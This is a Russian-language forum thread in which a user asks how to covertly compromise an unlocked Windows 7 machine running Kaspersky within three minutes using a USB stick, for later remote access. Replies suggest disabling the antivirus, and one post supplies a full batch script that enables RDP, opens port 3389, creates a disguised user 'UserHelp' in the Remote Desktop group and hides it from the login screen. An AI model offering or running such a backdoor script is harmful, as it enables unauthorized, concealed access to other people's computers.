• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

скомпрометировать windows 7, за 3 минуты

Bush_Kape

Green Team
24.01.2018
37
8
BIT
0
Всем доброго времени суток!
описание ситуации:
1)стоит машина под управлением windows 7
2)обновленный Касперский под паролем
3)пароль администратора стоит
4)разрешение на запуск exe есть
5)есть меньше 3 минут на манипуляции
6)есть флешка, которую можно применить
Сам вопрос: какие возможные действия, или что вы бы сделали, для получения бреши, для дальнейшего удаленного взлома, или есть варианты моментального обхода Касперского?
за любые идеи буду благодарен, за ранее спасибо!
 

CHEATER

Green Team
09.09.2017
79
43
BIT
0
эта связка не работает, так как каспер блочит rdp соединение
А смена порта ничего не даст? Можно попробовать антивирус антируткитом снести, только пробуйте это на виртуалке, сначала. Что он вообще блочит? Какие порты открыты, мб легитимные приложения подойдут.
P.S для того, чтобы вам снять пароль администратора, - придется грузиться с флешки, под этот шумок можно антивирус подправить.
 

Bush_Kape

Green Team
24.01.2018
37
8
BIT
0
А смена порта ничего не даст? Можно попробовать антивирус антируткитом снести, только пробуйте это на виртуалке, сначала. Что он вообще блочит? Какие порты открыты, мб легитимные приложения подойдут.
P.S для того, чтобы вам снять пароль администратора, - придется грузиться с флешки, под этот шумок можно антивирус подправить.
да можно, только у меня три минуты, а в этом случае не укладываешься по времени, я и так все манипуляции подвергаю тесту на своей машине.
 

CHEATER

Green Team
09.09.2017
79
43
BIT
0
да можно, только у меня три минуты, а в этом случае не укладываешься по времени, я и так все манипуляции подвергаю тесту на своей машине.
Так, давайте думать, что можно.
Вы должны смоделировать действия и в точности их повторить, только вы перед этим должны быть уверенны, что это приведет к успеху.
На своей машине я бы не проверял, чем вам virtualbox не по душе?
Как вы будите входить в машину? LiveCd? Я рекомендую это:
Порт менять тут:
 

Bush_Kape

Green Team
24.01.2018
37
8
BIT
0
Так, давайте думать, что можно.
Вы должны смоделировать действия и в точности их повторить, только вы перед этим должны быть уверенны, что это приведет к успеху.
На своей машине я бы не проверял, чем вам virtualbox не по душе?
Как вы будите входить в машину? LiveCd? Я рекомендую это:
Порт менять тут:
1)это не моя рабочая машина, а доп комп, так полностью моделируешь происходящие
2)машина разблокирована, и у меня есть время на действия: вставить флешку запустить с нее то что откроет доступ, достать флешку уйти
3) мне не известны какие порты на ней открыты, поэтому с rdp отпадает вариант
 

~localhost

Green Team
30.10.2017
230
49
BIT
20
Всё это просто реализовать обыкновенным батником, воспользовавшись стандартными программами Windows.
Код:
@REM Включаем дистанционное управление рабочим столом
@REM Ставим галочку на Мой компьютер=>Свойства=>Удаленные сеансы=>Разрешить удаленный доступ к этому компьютеру
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REM Эти 2 команды отвечают за разрешения двух учетных записей вход
reg add "HKLM\SYSTEM\CurrentControlSet\Contr ol\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REM Эта строка отвечает за путь файла termsrv.dll
reg add "HKLM\SYSTEM\CurrentControlSet\services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d %SYSTEMROOT%\System32\termsrv.dll /f
@REM Заносим в Windows брат маузер запись что порт этот добрый
netsh firewall set portopening protocol=TCP port=3389
@REM делаем UserHelp участником группы Пользователи удаленного рабочего стола
net user UserHelp ТУТ_ПАРОЛЬ /add
net user UserHelp /comment:"Windows System User Help" /fullname:"Windows Help"
net localgroup "Пользователи удаленного рабочего стола" "UserHelp" /add
@REM Прячем нашу запись UserHelp
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v UserHelp /t REG_DWORD /d 00000000 /f
.
а есть под win10? )))
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!